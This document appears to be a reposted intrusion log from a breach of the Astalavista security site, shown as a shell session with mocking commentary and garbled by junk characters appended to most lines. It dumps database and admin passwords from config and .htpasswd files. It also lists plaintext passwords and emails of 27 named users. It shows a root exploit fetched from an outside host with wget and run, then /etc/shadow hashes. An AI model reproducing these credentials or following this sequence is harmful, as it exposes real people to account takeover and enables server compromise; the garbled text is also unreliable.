drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql! ^8 a. b& A3 x9 D1 w1 e
drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com( R7 J. O P# |: x
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
1 q; q; P( _! j5 l; B5 C+ pdrwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner( E3 J3 R) `& n. I& V
-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg
2 h: D& E3 r0 c5 adrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
$ G5 a+ ?3 }5 G ~! j$ ? Ydrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
' t8 c; N2 k3 o, cdrwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd. I4 N* c7 m, V. c6 o# n3 L) m
-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php, O2 G6 n5 }8 p! d4 c2 d
-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico
9 i9 s( R( k5 H* Y+ l+ Zdrwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed( U" f4 [7 f. ~; Q' a/ J
drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
+ I: v7 J& i6 p) N. B-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess
1 K$ n& C8 P9 U% j R0 u4 G" t-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess# E7 Y3 H2 }$ |! Y3 k% n9 f3 M
-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php0 N; i; c& N( X
-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html
. t2 w. R% y" D1 [& {% t' O! ]-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php$ P9 |; R) X3 S: _0 C0 Y9 O
-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php
6 s- @5 V) h. A. V-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf8 b& V9 c" Q( G" W
drwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc9 C& M; W/ O, }. l
drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang( x9 B# t' }! f! R: p
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib0 @8 J( M8 P: I1 n
drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
- W. Q% p* a: b( x1 `, F, X, ^) kdrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member
0 m* U$ i6 Y/ H( [" a w$ Z& n% Ldrwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata1 Y% D$ H5 {2 _% X8 l* \& U q
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
! L$ H+ | S# O$ {- e+ C- G-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf
& K$ K; N9 W5 A; ^2 s* @1 f6 S! rdrwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
! O( [5 K2 n6 o n: Q-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt
7 B& Y* d& i+ U& Y9 vdrwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss7 {- @( C" h, \3 N
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
+ a& Q* F1 w$ z+ Z; f5 adrwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com. y8 s! l3 Y% N
drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes5 U4 t, B* |. g& [5 ^* S
drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
8 z+ A( h$ `% c' [8 j6 _) Sdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
4 h) D+ _$ @' S3 i- y7 {drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2( d3 i4 Q9 ^9 s& K" m
drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old: k/ i8 M+ U& ?" Y p6 g- v
-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php
- i5 N9 c3 @# O2 u! wdrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki* |5 D8 z# z$ M
" L' @2 L$ X+ G+ Lsh-3.2$ head -20 index.php( R# ^& v W3 Y6 M" {
<?PHP( W: o P( R% a8 X, R. {
/**% g0 a/ c' Z1 j5 B4 b! m
* Mainfile (external) for astalavistaNET v2.09 p8 t0 v& l, q0 ~' }- D
*$ y1 r8 E7 ^/ ]$ {) P
* @copyright Astalavista IT Engineering GmbH9 u3 I; B9 X: Y6 w4 U$ }& t
* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>$ M2 [2 h1 F) w$ f- C
* @version 1.0
3 }3 G/ K. B2 k- j# B% U*/
6 m/ [+ i* U- R) r2 V* W8 n- W+ c0 j4 S8 a1 o4 B% Z
if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {
' N. |7 g" |7 v) X $dontStartSession = false;
3 U7 Y7 l) m" z$ @" [0 @' Q3 }0 y } else {/ Y4 {5 v3 _5 U+ p
$dontStartSession = true;, t9 X+ N6 U$ \) @# u/ H
}% d6 L( y5 X- y- }0 |
require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);, W; [; J$ X1 `
require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’); d: M* P0 a: [5 t- Q
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
5 A, J. |! I; I require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);7 _* G; v/ T: Q( |, U: V; F: m
, J$ j3 ^$ b' V$ i6 }: i
sh-3.2$ cd config2 R7 d* S- }5 H
sh-3.2$ ls -la! M6 d5 c7 e3 R | T; r8 S- s
total 32+ ~1 a1 |0 W( x2 D* A
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .6 L- B$ f- L2 F0 }' s$ E
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
2 s! D$ d& v! |2 V) H2 W, S( @-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php
3 y8 v* d$ ^* ^( }, Y3 C-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php
G$ @. C8 Z. N1 I& D2 E-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php
: P( f- X$ I5 e" F, p" A-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
3 t- m: c3 S3 z, m6 y( H-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php }$ y2 T( J( F
5 L9 N: J* H. L7 J* ]
sh-3.2$ cat com.conf.php$ c1 R( u/ c% B8 d
[snip]
6 \+ B& A! z7 c a! Y8 Z" G5 a//member-database7 \4 G; _6 ~1 y5 A
$_CONFIG['db_mem_server'] = ‘localhost’;
' V" [1 X: M% p7 l6 h$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;# |8 ] e5 P# r( X6 W d/ y& g; J) e
$_CONFIG['db_mem_user'] = ‘astanet_db’; q( {/ F8 [* N1 j; y* H) p
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;
- C# ~4 r; A! Y1 x. @' w$_CONFIG['db_mem_debug'] = false; //true or false
$ B9 O6 v, w1 R& {//ads-database
' ~4 z) w: r3 F6 ~8 i; H8 e; ~$ @$_CONFIG['db_ads_server'] = ‘localhost’;& o4 L# M( `$ ]
$_CONFIG['db_ads_database'] = ‘astanet_ads’;* K c6 b+ d0 |" E0 d6 C% d: n
$_CONFIG['db_ads_user'] = ‘astanet_db’;, l+ \1 s4 r i, k. @6 P
$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;' c# \2 P9 \) [# A
$_CONFIG['db_ads_debug'] = false; //true or false+ a4 \9 m/ [1 W4 j# j) ?; D
//rainbow-database! I* M2 C7 B. ]: h$ _) u2 X
$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;
9 V1 _3 X& q5 d7 X% N. h! j$_CONFIG['db_rainbow_database'] = ‘rainbow’;
; r7 w+ H- Q4 e( x+ J$_CONFIG['db_rainbow_user'] = ‘dinu’;
4 K; }, b- y4 C( j" P3 K4 @$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
4 M7 `- \* V5 t! R9 j$_CONFIG['db_rainbow_debug'] = false; //true or false
* K# X4 }/ b7 v$ X! N2 p//mailing lists database/ Q9 a6 y7 U& c
$_CONFIG['db_mailing_lists_server'] = ‘localhost’;0 E0 k! N: m0 R1 a; M' w- f, M
$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;0 u- {: M" e: a6 `7 P+ U8 h. z
$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;
- e4 j5 n7 V+ d* ]1 f! q! G) S$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;) G. w0 L: N( b7 \) M
$_CONFIG['db_mailing_lists_debug'] = false; //true or false: v9 T! w3 g" j
//paypal
1 u0 A' _# v. e6 E: ]$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;
1 M! |* w3 c9 a2 @' j$ r' j$_CONFIG['sub_pp_cmd'] = ‘_xclick’;
( n3 W8 Q) `4 ~3 _$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;: o' y/ \/ [+ C
$_CONFIG['sub_pp_noship'] = ‘1′;
' m. y8 p2 A7 n# e' K9 \9 Q$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;9 c e) v' o7 U2 ^! ^' M* `
[snip]
; |" S; W: Y3 j( o9 T, A7 E7 o
* O0 G0 n( o* _/ u, v6 I7 msh-3.2$ cd ..1 [8 C. |% c7 {! K0 y% G
sh-3.2$ cd member
( @# t( V0 Q( v* H: Osh-3.2$ ls -la
5 O$ Z, d W P6 Z/ I% l8 V |total 209 y7 {4 t- L7 r2 E. q
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
" r* {3 @' c w Ddrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
$ j2 l7 M6 O+ s* m. K7 j9 K-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess/ ~" i, N5 j) D5 }6 ^
-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php& d ]) X' L+ y) b2 F) I8 i2 Y3 a
sh-3.2$ cat .htaccess
" j$ ]$ U2 b& z7 S% n3 g$ BSecFilterEngine off
/ L9 N% Q& X0 L$ Q- \; [8 c& D' J4 d* b* }! V
sh-3.2$ cd .., H3 f) A% E$ T! a% ^5 _
sh-3.2$ cd cron
* J' p8 b5 j2 \) ~0 @5 A' psh-3.2$ ls -la8 z* M9 e9 K3 y0 ?, p3 H
total 168
/ @2 X5 W! c8 A- u6 s, m$ adrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .+ E$ L2 g. D$ C; [3 Z' d
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
2 X$ }2 i5 ?$ o. S7 K-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php
1 P) r- ^5 _7 c& Y/ m-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php
7 d/ w! @ H8 D/ I-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php# a2 g' n7 d2 f) `' K7 T; V
-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php9 N, N/ M; [# j4 O- z
-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php
7 s9 W; z1 f0 m. G5 ]- T& _3 K-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php
4 P. J; r N9 `" |& q$ Q5 y-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php# i* R6 l8 A& {# c- b
-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php
2 \& a7 M, r6 Y-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh3 U; J5 K6 Q6 ]( T* j f
-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
3 P$ }$ ?6 R5 x; U& H-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php
% D& Q3 x% P( p1 T. v8 z$ K5 h! A-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php! E# y% w5 B4 a
-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh
, {, s* y" |' F- x- W* U7 E# C-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php. }: P1 R, P5 Z# ?
-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php3 g0 ^2 I# F) K1 `
-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php( W/ Q7 Q3 w' ]) V0 t
-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
" d9 r3 r6 ]) f, F3 B: D8 f4 K% s( a-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php
: b7 U+ C$ M: y* u% fdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
8 _& A0 ]5 \8 P! o c- _! t-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php( F/ x$ C s' }: |
-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php
0 I( P( U& a( I; N# x7 B$ |. C! C* H2 e3 v! O6 O
sh-3.2$ cd ..
% P( ~( d$ a0 W+ f1 jsh-3.2$ cd _007( z* B) o+ [# `# S, x
sh-3.2$ ls -la' u7 a- e+ C. j1 U
total 24* w$ r( O* c$ y! |" e% Q* ]
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .
9 G+ @; n. H; rdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ... T! e( s" J2 s s4 w4 o
-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess
( c3 j4 E, [, `( [-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php
3 J9 e8 [! y5 ? I/ R-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php
5 W" H$ H$ O$ W* R1 o& U- hdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap+ u5 F' l: u7 @/ Q
; M+ _, n+ t3 N7 L, W7 gsh-3.2$ cat .htaccess2 _. b5 A2 C% J7 J* Z
authType Basic0 w5 t) j* t; z( I$ c' {& }& n. E
authName Admin" Y, J' j' D3 h
authUserFile /home/astanet/auth/.htadm_pwd
+ u. C! c/ f4 j5 `% O) j0 rrequire valid-user7 q5 w' l& h: b! J" U
# U7 B3 D% V p. X4 K0 H7 p' E4 O% {sh-3.2$ cat /home/astanet/auth/.htadm_pwd- Y, z1 [5 h5 {% w" E3 U$ d% i3 t
admin2net:CR0bl65MwhfT; Y u" F! t0 `! ]: H8 U4 F, v
- d% ?0 z$ J% [6 Y O
sh-3.2$ mysql -u astanet_db -p
2 C7 t* e! `5 Z# P- X- jEnter password:
" c+ \" m0 R1 B% a1 L" Z: ^# i) _Welcome to the MySQL monitor. Commands end with ; or \g.8 U8 p' y+ k6 {2 E$ a6 ]3 A- p o% @
Your MySQL connection id is 275153
. L* n; E- g3 N/ j( N" c6 GServer version: 5.0.45-community-log MySQL Community Edition (GPL)
% ?0 C2 c. n) {* m
J7 @) [# r, M1 j3 G( h. Z) SType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.+ v) ^ \" s& a1 V' x
$ g- d, d, p: f3 b' J M' j6 k
mysql> show databases; T4 ~7 _' f6 J( J
+———————–++ S- N5 f J) t" P
| Database |
: j+ Z2 A8 Q. |7 ~" [% [" b- o+———————–+
* s0 o; c0 r; y# i8 W| information_schema |
- j( h3 |9 r4 v9 W) d| astanet_ads |
4 I/ h2 o* V' z| astanet_mailing_lists |
0 R9 G# Q& i& S) ]7 K) e| astanet_mediawiki |
( H- |# _; h( j( j9 u| astanet_membersystem |; v8 u$ a( ` U( ]5 L) O2 h
| test |
8 h' K2 d3 g5 v3 M4 D+———————–+
7 j8 W g. T( t* M6 rows in set (0.00 sec)- @( s4 \7 P9 r. Q* I0 q7 ^, P
& o5 g/ D, t- M0 n
mysql> use astanet_membersystem
6 U$ F. Z9 C1 f5 T6 r' ~/ _4 kDatabase changed1 @, P$ ~, q3 v" z1 j" V( v
mysql> show tables;. c- R* [5 [/ n2 U+ V6 K" r7 q
+———————————–+( B8 G, C' ~0 y; B: d# T
| Tables_in_astanet_membersystem |
; h2 |, n; K4 j" ^0 a5 p& F7 ~+———————————–+
7 V5 e& G7 |) J& c a| blacklist_categories |
* M0 d l& n# L2 Y% Q| blacklist_content |2 x: e5 y; Y. g( H
| blacklist_levels |
1 J/ \- l+ L# S# k+ } m| blacklist_mcset |
" Z; A$ _: \0 _/ v% v" x| dir_categories |
4 X: V5 A$ U1 ^. j| dir_comments |( |6 H6 {3 q9 ? t0 p
| dir_links |
* A9 h! H) v( || dir_temp |
9 d" U$ m p/ R {! I5 Y% M1 || dir_votes |5 y- X" h3 u1 S8 d8 b! L8 ?
| documents |# y8 H( m# B3 H* q" ^
| documents_categories |" ~4 ^+ {: s- z
| email_content |; p {: N9 e" \0 g
| email_settings |
/ m& C/ J" x' ?" @% ?& o" f; L8 ~8 U/ g| exploits |1 M! h8 ~0 f+ q, W
| exploits_categories |
/ I s* [5 S3 a| exploittree_categories |
! t( Q) D# @7 U) A| exploittree_exploits |. p+ {/ ~" X, _4 p4 F0 ~& {" D
| home_values |
: M9 V# b0 z, _+ g' f1 t| iso_countries |
2 V d: c0 g I| links_categories |
2 i2 E8 X; p/ e: r7 J4 \| links_records |
5 s! V# k$ ~. Y# s- E( U3 G| links_unauth |
2 [3 o+ F" ?; h2 h3 m| links_votes |
, ?/ {% I6 E- l9 i! ?| log |
2 x4 ~& {* D+ D6 m| news_categories |
9 ^$ l* F r, G| news_comments |+ X- O) O* O( N$ n& J
| news_emoticons |
4 N+ j( v6 s* f7 r. a0 r$ d, `| news_latest |
9 [; L, E; ^* U- q, b| news_messages |
, X0 F% h5 R* E8 {1 Q, l| news_statistics |
1 B% \& b. l$ f; O| news_votes |
' S Z% O5 [! w7 D| prices_content |& p# U5 m8 a. A* R6 b: d1 n
| prices_offers |
' j- Y" `3 X1 I| rss_settings |
2 {" ^ a% [$ H+ u0 m+ M| sessions |
( p; D2 X! e- D( ]| stats_signups |. F5 T+ M$ ^6 u8 T* O6 V4 b
| u2u2 |$ `/ F) g4 ~1 k! T, `
| u2u_contact |
5 }2 S& E- e' t, f| u2u_settings |% ~2 n+ T a6 q! W$ y+ Q3 u' [" e
| user_keywords_selected_categories |) c# ^# M; C( |
| users |7 z+ X; T& f1 E; t# J
| users_ipn_test |
' @) p& N) g4 v& y* p$ t| users_keyword_values |
; O/ m$ Z- ?8 C/ I: _: y- J4 h| users_profile |
1 A- M, A# N i7 M| users_temp |: `9 p4 L `! }5 Y+ ?2 G6 m. s
| users_upgrade |1 K. n8 g4 w" W7 Q: W
+———————————–+
8 o' a5 U4 d8 Q( C8 x5 D46 rows in set (0.00 sec)
9 ~: Y+ |: Q% k6 t: \7 A7 V' O8 C" F7 E7 l: b* _% Q; ?* {2 V
mysql> describe users;9 L& E+ C) E) _" x) n
+————————–+————————————–+——+—–+———————+—————-+
) D, V3 u: o2 b4 o! n. e| Field | Type | Null | Key | Default | Extra |
8 i2 i( e# M/ i7 P/ N& Y+————————–+————————————–+——+—–+———————+—————-+; Q* M _8 U T6 w
| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |# F. }# z6 F: l
| user | varchar(50) | NO | | | |
- `% B- ]) |3 C' O7 G5 V, @| nickname | varchar(30) | NO | MUL | anonymous | |( l( J3 |" v; Y
| password | varchar(30) | NO | | | |
% W( }, E! p0 q. r' ~- u| userlevel | tinyint(3) | YES | MUL | NULL | |
: y/ t! S0 F/ F9 [| exp | int(8) unsigned | NO | | 0 | |) c, ^- Q! P6 r a
| email | varchar(50) | NO | | | |8 |3 X) r5 i4 A$ m8 s. {% @
| ip | varchar(15) | NO | | 0 | |) `, d# \3 A8 _
| proxy | set(’0′,’1′) | NO | | 0 | |
0 ^2 Q5 h0 `# m5 k| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |" A6 z0 G% A2 @4 W4 D( N5 |
| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |
2 ]2 V3 H0 J- h( M6 F4 U: {| anz_in | tinyint(1) | NO | | -1 | |
, U' I" A* c$ V$ m s) s& d| status | tinyint(1) unsigned | NO | | 0 | |
9 j( a& [+ Q4 M/ s| checked | set(’0′,’1′,’2′) | NO | | 0 | |* X% E( q7 Q- } V
| freemember | set(’0′,’1′) | NO | | 0 | |. {( @6 N- {" }; y `
| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |
. O9 G# l% z: U% q) P| lang | tinytext | NO | | | |0 T$ v9 g4 N, @! c% o$ U
| adid | smallint(6) | NO | | 0 | |$ a; j8 H& Q) D( v
| pp_txn_id | varchar(255) | YES | | NULL | |
7 l2 }7 A' h1 `# h. E| cnb_transaction_id | varchar(255) | YES | | NULL | |) Z* j" d5 \$ I! q7 n* N" p
| cnb_order_id | varchar(255) | YES | | NULL | |- ?! }2 q! r$ V( r
| cnb_user_id | int(11) | YES | | 0 | |% @3 I; u+ E: B0 A2 V
+————————–+————————————–+——+—–+———————+—————-+8 f/ \ o3 l9 A5 M3 F
22 rows in set (0.01 sec)
, a5 d7 f( c( r e4 |( q* X* W9 _0 N* z: v
mysql> select count(*) as skids from users;
, t! Q0 i5 Z$ @) k( {3 T4 m+——-+
$ I: d1 S. p' T0 h" Y| skids |
; x$ |4 e* q0 |# n- q5 K, ]( {+——-+
* X/ W! _ y9 i. E% ?' D* T" f| 25199 |7 e' {* W6 x1 c3 f! w$ u% T" _/ a, Q
+——-+
+ H5 y: y+ D& ]2 C X r1 row in set (0.00 sec)9 E( J5 f$ r# W1 \& h' M3 z
f, e0 J' p' s% s$ P& R2 e0 j
mysql> select user,nickname,password,email from users where userlevel = 1;9 l$ |' P: n/ n0 _7 D! P; g: A7 }
+————————–+———————-+——————+———————————–+0 h" K" J- ]: ]1 c4 u. g
| user | nickname | password | email |
- h: z g' x2 z3 r7 T+————————–+———————-+——————+———————————–+
' D8 z e" l% l, |( O| pascal | prozac | astaman3 | 链接标记info@astalavista.net |
8 Z0 S! \) Y# K1 X& @; |4 \| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |
& F2 E8 L S3 D2 {! I1 C| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |
Q: R6 K- K+ j| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |! D, [3 {( B8 X; K+ J% `
| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |
) q+ g6 \0 b9 D( y3 {' r| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |
0 |, c, c2 ^ c; E9 q) ?| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |3 m* e% @7 s3 c8 G* j
| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |+ n6 ^% r0 w( l7 n6 E& W
| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |$ k% z+ C; Q' ~* r% n; V8 t
| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |
{4 D, D$ k( i4 j) o' x) P| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |
; _% [& ?* @9 Z| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |
% |3 C7 J3 P8 F| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |/ V" ]: B( j" P7 C
| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |% X% |* |+ Z" l7 D& j. I/ S+ o2 A% ] M
| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |
6 V" @! M/ M1 ^4 v9 C| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |
8 K& _! v9 ~9 t0 m| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |& X, J8 ^/ [1 F5 Z
| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |% l- K9 U& F" l* f5 M7 Q! a& L5 s
| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |
( i% q- T3 T( D& v" D. W& t8 v| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |! f7 m: @( @" ?0 i" Q
| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |% s g0 S: D- @" ^
| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |
7 e0 m8 q7 s n! A1 B# G| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |1 @! Q+ M0 o* R }0 j F1 G# ]9 j% n
| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |' m5 q# O( x% [
| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |
2 P5 ^3 q* A% B4 a| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |( C' C- z: F/ ?, \& n! X
| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |8 D2 I- q/ s) N; V( O% N
+————————–+———————-+——————+———————————–+2 H, w* e! D! _
27 rows in set (0.00 sec)/ R$ q* [7 I5 }4 F
: ?, g: m) U! g9 ^
mysql> exit;
2 k% q; u7 |! @0 t8 VBye
9 D0 l' z( U0 l/ X$ Y0 N/ j$ ]: m) |
[~] plaintext passwords? yes,0 E7 P* |$ A! N
Those so called “security professionals” who charge you $6.66 / month to9 w4 x0 |! [7 ]- k
register at their hack-proof portal, save your passwords in plaintext…6 ~1 y) Y& Y4 w' k4 H
brilliant!% N7 S& g4 j; J; _$ b
! q( ^6 e9 k. G$ O, x; K D[~] This been fun but we want more., @& N4 {/ a5 f0 C! E V4 S
# ]' J/ q% N" B$ Z/ z' w+ w
sh-3.2$ uname -a
* C- n, A$ c+ E3 {4 n, @Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
& y+ o$ n) Q3 @ J. Q5 g* tsh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url], h N1 }/ x: g5 b
–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]
; U2 [ W: u% d; {Resolving anti.sec.labs… 13.33.33.37
: p2 ^/ l+ Y9 r+ u: `2 bConnecting to anti.sec.labs|13.33.33.37|:80… connected.( {0 `; v" K& i6 i; I
HTTP request sent, awaiting response… 200 OK( V4 A1 `, i9 ?/ j6 Z- K% t
Length: 18200 (18K) [text/plain]- O# e! S9 p, j; f4 ]5 H) H
Saving to: `g0troot’
5 P9 z. z( Z# {- X8 O6 V( i% g1 D3 Z& w* x* \
100%[=========================================================================================================================================>] 18,200 58.6K/s in) m' x( W! S) L, r* l2 U
0.3s5 a2 B: T- R. l$ h9 d7 U6 j
" @: b+ d- }5 v W. z9 g& {
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]
5 e+ E0 I7 l$ T) i& [- x( r% ]
% \0 W! q' g; m* V/ L7 K+ xsh-3.2$ ./g0troot -i x86_64- n% ~1 [5 G% } j" O% V2 e
[+] g0troot - anti.sec.labs/ ~, Q5 y' v1 b8 h3 f$ e
[+] Target: 2.6.18-128.1.10.el5
$ a% P! R! N+ C& c* e6 Q[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]5 W2 P7 T! V, c* d+ E. ~+ n' A7 T
8 x8 c$ R) U! e. H[+] r00tr00t
! O8 K. g( \$ p[~] Executing shell…
3 c5 m4 c1 k( @4 k/ `2 F6 K9 d a/ V" D- O
sh-3.2# id
9 U2 S3 ?5 D' D! q1 V: ~: Suid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
% O& e, U8 ?+ A5 c- }& H4 @2 _6 L. Z) s- J7 b. Q
sh-3.2# cat /etc/shadow
0 [: F; R; Q& A6 `9 \root 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
7 \0 [( F3 \' S6 |* L+ N' U[snip]
! i. J$ C7 f: [# Vadmin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::: X0 u+ d" x% }! c- O
jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
- H5 D& c+ ]8 E, Qcom1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
B. C' B, I$ H! O" E+ F! Kastanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
% _0 ^. a5 q' \2 o- r4 _, g3 g& q1 k: M
sh-3.2# cat /etc/motd1 D5 |5 ?& S0 H* H, J' D4 ~
#####################################################" K; R4 m1 U5 D- M9 t3 w7 |- q7 t7 A9 y
#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #
